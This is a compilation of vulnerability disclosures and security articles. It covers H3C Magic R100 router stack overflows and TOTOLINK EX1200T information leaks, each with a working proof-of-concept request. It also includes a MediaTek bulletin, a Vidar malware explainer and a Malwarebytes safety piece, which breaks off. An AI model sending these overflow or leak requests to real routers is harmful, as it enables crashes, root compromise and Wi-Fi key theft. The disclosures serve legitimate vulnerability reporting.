H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the Asp_SetTimingtimeWifiAndLed parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through param parameter is passed to V6, and then the matched content is formatted into the stack of V16 through sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    Asp_SetTimingtimeWifiAndLed=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30923: IOT_vuln/H3C/magicR100/16 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the SetAPWifiorLedInfoById parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the param parameter is passed to V5, and then the matched content is formatted into the V9 stack through the sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    SetAPWifiorLedInfoById=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30924: IOT_vuln/H3C/magicR100/15 at main · EPhaha/IOT_vuln

In WIFI Firmware, there is a possible memory corruption due to a use after free. This could lead to remote escalation of privilege, when devices are connecting to the attacker-controllable Wi-Fi hotspot, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06468872; Issue ID: ALPS06468872.

**June 2022 Product Security Bulletin**

Published 2022-06-06

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and TV chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-21745

Medium

CVE-2022-21746, CVE-2022-21747, CVE-2022-21748, CVE-2022-21749, CVE-2022-21750, CVE-2022-21751, CVE-2022-21752, CVE-2022-21753, CVE-2022-21754, CVE-2022-21755, CVE-2022-21756, CVE-2022-21757, CVE-2022-21758, CVE-2022-21759, CVE-2022-21760, CVE-2022-21761, CVE-2022-21762

****Details****

CVE

**CVE-2022-21745**

Title

Use after free in WIFI Firmware

Severity

High

Vulnerability Type

EoP

CWE

CWE-416 Use After Free

Description

In WIFI Firmware, there is a possible memory corruption due to a use after free. This could lead to remote escalation of privilege, when devices are connecting to the attacker-controllable Wi-Fi hotspot, with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-21746**

Title

Improper input validation in imgsensor

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In imgsensor, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6885, MT6893, MT8167, MT8167S, MT8168, MT8175, MT8362A, MT8365, MT8788

Affected Software Versions

Android 9.0, 10.0, 11.0, 12.0

CVE

**CVE-2022-21747**

Title

Improper input validation in imgsensor

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In imgsensor, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6885, MT6893, MT8167, MT8167S, MT8168, MT8173, MT8362A, MT8365, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 9.0, 10.0, 11.0, 12.0

CVE

**CVE-2022-21748**

Title

Improper access control in telephony

Severity

Medium

Vulnerability Type

ID

CWE

CWE-284 Improper Access Control

Description

In telephony, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8321, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21749**

Title

Improper access control in telephony

Severity

Medium

Vulnerability Type

ID

CWE

CWE-284 Improper Access Control

Description

In telephony, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6750, MT6750S, MT6752, MT6753, MT6755, MT6755S, MT6757, MT6757C, MT6757CD, MT6757CH, MT6758, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6795, MT6797, MT6799, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT6895, MT6983, MT6985, MT8321, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21750**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6779, MT6781, MT6833, MT6853, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21751**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6771, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0

CVE

**CVE-2022-21752**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21753**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21754**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21755**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6731, MT6732, MT6735, MT6737, MT6739, MT6750, MT6750S, MT6752, MT6753, MT6755, MT6755S, MT6757, MT6757C, MT6757CD, MT6757CH, MT6758, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6795, MT6797, MT6799, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT6895, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21756**

Title

Improper input validation in WLAN driver

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In WLAN driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT6895, MT6983, MT6985, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21757**

Title

Uncontrolled resource consumption in WIFI Firmware

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-400 Uncontrolled Resource Consumption

Description

In WIFI Firmware, there is a possible system crash due to a missing count check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6877, MT6885, MT6889, MT6983, MT6985, MT8167S, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8667, MT8675, MT8766, MT8768, MT8786, MT8788, MT8789, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21758**

Title

Double free in ccu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-415 Double Free

Description

In ccu, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6885, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21759**

Title

Buffer copy without checking size of input ('classic buffer overflow') in power service

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Description

In power service, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6761, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6875, MT6877, MT6879, MT6885, MT6891, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21760**

Title

Integer overflow or wraparound in apusys driver

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-190 Integer Overflow or Wraparound

Description

In apusys driver, there is a possible system crash due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT9636, MT9638, MT9666

Affected Software Versions

Android 12.0

CVE

**CVE-2022-21761**

Title

Integer overflow or wraparound in apusys driver

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-190 Integer Overflow or Wraparound

Description

In apusys driver, there is a possible system crash due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT9636, MT9638, MT9666

Affected Software Versions

Android 11.0

CVE

**CVE-2022-21762**

Title

Integer overflow or wraparound in apusys driver

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-190 Integer Overflow or Wraparound

Description

In apusys driver, there is a possible system crash due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT9636, MT9638, MT9666

Affected Software Versions

Android 12.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

June 6, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2022-21745: June 2022

In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can obtain sensitive information (wifikey, etc.) without authorization through getSysStatusCfg.

Permalink

main

Switch branches/tags

Go to file

*   Go to file

*   Copy path
*   Copy permalink

p1Kk 21\_10\_20

Latest commit dcc2b75 Oct 22, 2021

**History**

**1** contributor

**Users who have contributed to this file**

TOTOLINK EX1200T LEAK Vulnerability Description PoC

16 lines (9 sloc) 361 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

**TOTOLINK EX1200T LEAK****Vulnerability Description**

PRODUCT: TOTOLINK EX1200T V4.1.2cu.5215 (latest version)

The attacker can get the sensitive information (wifikey, etc.) without authorization.

**PoC**

    {"topicurl":"setting/getSysStatusCfg"}

CVE-2021-42893: vuln/totolink_ex1200t_sysstatus_leak.md at main · p1Kk/vuln

By Owais Sultan
In this digital era, online threats are booming as much as the internet user base. Sometimes, malware infects…
This is a post from HackRead.com Read the original post: Fake Updates Continue To Be A Digital Risk: What To Do?

In this digital era, online threats are booming as much as the internet user base. Sometimes, malware infects devices due to vulnerabilities unknown to people. However, it frequently comes as a direct consequence of users’ actions. For instance, entering that suspicious website promising exclusive content or software for free. Speaking of human error, one of the most popular techniques used by hackers is fake updates.

But what are fake updates? These are malicious software downloads masquerading as legitimate updates. This type of malware is often used to infect devices with ransomware. The recent development in this is Vidar Malware. What are its risks, and how to contain them?

**What is Vidar malware? **

The recent fake update was discovered impersonating a Windows 11 download portal. These portals ultimately caused a Vidar malware infection. The same malware was found to be spreading through the fake InterVPN website.

Vidar is a kind of info-stealing malware that may be utilized to monitor users. This malicious software can steal login credentials, take screenshots, bank details, etc. Besides general info stealing, Vidar was also discovered downloading and executing additional malware payloads. Moreover, the malware deletes itself from the system after completing its work.

Fake Windows 11 download website delivering Vidar malware

**How does Vidar work? **

It is being spread across the internet using phishing, fallout exploit kit, and pay-per-install PrivateLoader dropper. The email contains an attachment as a .iso disk image, which is misleadingly called “request.doc.” This ISO is mainly composed of two files:  an executable (app.exe) and a Microsoft Compiled HTML Help (CHM) file (pss10r.chm).

Here’s how it enters the systems: When a notorious CHM file is loaded, a JavaScript snippet executes the app.exe. The second stage downloads and decodes the Vidar malware, which is then performed on the system.

Then, the Vidar samples communicate with their C2 server via Mastodon and Telegram. After successful communication, user profile bio sections are examined, and C2 addresses are extracted from the profiles. The malware is then copied to the target system, where it sets up its configuration and begins collecting user data.

So, this is how it hides its presence in your system. But how to save our devices from such attacks?

**How to protect yourself?**

Now that you know how to identify fake updates, it’s time to take measures to protect yourself. Here are some tips:

**Use a firewall**

This security system helps screen out incoming and outgoing network traffic. Good firewalls can often prevent malware from contacting the Command & Control server. It is how ransomware works – it needs to contact the C&C server to get a key that can encrypt your files. If it can’t reach the C&C server, it can’t get the key and thus can’t do any harm.

**Protect internet connection**

Your computer is only a part of the defense strategy you must employ. Malware can exploit many vulnerabilities, including unsecured networks. Luckily, you can guarantee that each network you connect to is safe. 

All it takes is setting up a VPN for Windows on your laptop and enabling it whenever you use it outside the home. Public Wi-Fi can be extremely dangerous: outsiders can snoop on your activities or use security loopholes to infect your device. Therefore, remember never to connect your devices, be it a Windows laptop or an Android smartphone, to free Wi-Fi without a VPN. 

**Change your update settings**

We often have our update settings on auto-update. It will install itself as soon as an update is available. This option should be preferred as it ensures you can have a PC running the latest operating system. If you do not schedule automatic updates, you may delay updates indefinitely. 

**Say no to piracy**

Free software and games can be tempting but can be a source of cyberattacks. Therefore, use only licensed software. This way, you will be sure that your updates are from a trusted source. Additionally, stay away from alleged exclusive offers for programs on random websites. 

**Install an antivirus**

An antivirus program will scan all incoming and outgoing files for a malicious activity like ransomware or adware. If it detects anything suspicious, it will alert users and recommend removal. Of course, it is essential to get a trusted antivirus program. Many fake antivirus programs could warn you about fake threats because they wish you to buy premium versions. 

So, even if you accidentally click on a fake update, the antivirus will take care of it. Install updates only from official websites. It is the safest way to ensure that the update is legitimate. If you ever come across any pop-ups that look legitimate, don’t click on them. It is best to counter-check the update on the official website and then download it from there.

**Always keep your system updated**

The best way to know whether any update is fake is to keep your system up to date. Any unexpected update now will be quite suspicious. Moreover, updates often contain security patches that fix vulnerabilities in your system. So, it’s always a good idea to keep your system updated.

**Backup your data**

This is more of a precautionary measure than anything else. By backing up your data, you ensure that you won’t lose any important files even if your device gets infected with ransomware. Many cloud storage options are available these days that offer good security and are affordable.

**Conclusion**

Apart from these precautions, it is essential to practice safe surfing to avoid these threats from detecting your device.

Fake Updates Continue To Be A Digital Risk: What To Do?

In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can obtain sensitive information (wifikey, etc.) without authorization.

Permalink

main

Switch branches/tags

Go to file

*   Go to file

*   Copy path
*   Copy permalink

p1Kk 21\_10\_20

Latest commit dcc2b75 Oct 22, 2021

**History**

**1** contributor

**Users who have contributed to this file**

TOTOLINK EX1200T LEAK Vulnerability Description PoC

16 lines (9 sloc) 362 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

**TOTOLINK EX1200T LEAK****Vulnerability Description**

PRODUCT: TOTOLINK EX1200T V4.1.2cu.5215 (latest version)

The attacker can get the sensitive information (wifikey, etc.) without authorization.

**PoC**

    {"topicurl":"setting/getEasyWizardCfg"}

CVE-2021-42891: vuln/totolink_ex1200t_easywizard_leak.md at main · p1Kk/vuln

In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can obtain sensitive information (wifikey, wifiname, etc.) without authorization.

Permalink

main

Switch branches/tags

Go to file

*   Go to file

*   Copy path
*   Copy permalink

p1Kk 21\_10\_20

Latest commit dcc2b75 Oct 22, 2021

**History**

**1** contributor

**Users who have contributed to this file**

TOTOLINK EX1200T LEAK Vulnerability Description PoC

16 lines (9 sloc) 371 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

**TOTOLINK EX1200T LEAK****Vulnerability Description**

PRODUCT: TOTOLINK EX1200T V4.1.2cu.5215 (latest version)

The attacker can get the sensitive information (wifikey, wifiname, etc.) without authorization.

**PoC**

    {"topicurl":"setting/getWiFiApConfig"}

CVE-2021-42889: vuln/totolink_ex1200t_getWiFiApConfig_leak.md at main · p1Kk/vuln

This Internet Safety Month, learn about the consequences of unsafe Internet practices, and how to avoid them. 
The post Internet Safety Month: Avoiding the consequences of unsafe Internet practices appeared first on Malwarebytes Labs.

Welcome to Internet Safety Month, a once-a-year event in which you, the public, are told that anywhere between three and 30 different best practices will simplify your approach to staying safe online.

Unfortunately, much of the well-intentioned advice surrounding Internet Safety Month ignores one basic fact about how people change their habits: We typically only correct our behavior after first making a mistake.

We buy rain boots after feeling the unique misery of drenched socks. We become sunscreen evangelists after getting burnt on the beach. We try on a different pair of jeans after a separate pair caused psychic damage to our egos.

This year, then, for Internet Safety Month, we’re packaging our advice a little differently.

Today, we’re going to share stories about the consequences of unsafe Internet practices. By focusing on this context, we hope that you’ll come away with a stronger understanding about, for instance, _why_ you should use a password manager rather than _that_ you should use a password manager.

Here’s what to avoid during Internet Safety Month, and every month after.

****Don’t lose thousands upon thousands of dollars****

In the world of online scams, criminals care about one thing: Your money.

That’s true for the criminals who send you phishing emails that ask you to fill out personal information on bogus webpages that spoof the legitimate sites of Netflix, or Facebook, or your bank. It’s also true of the criminals who prey on the elderly and the unassuming when pretending to develop a romantic relationship online, only to later ask for financial support and disappear.

None of these situations are hypotheticals.

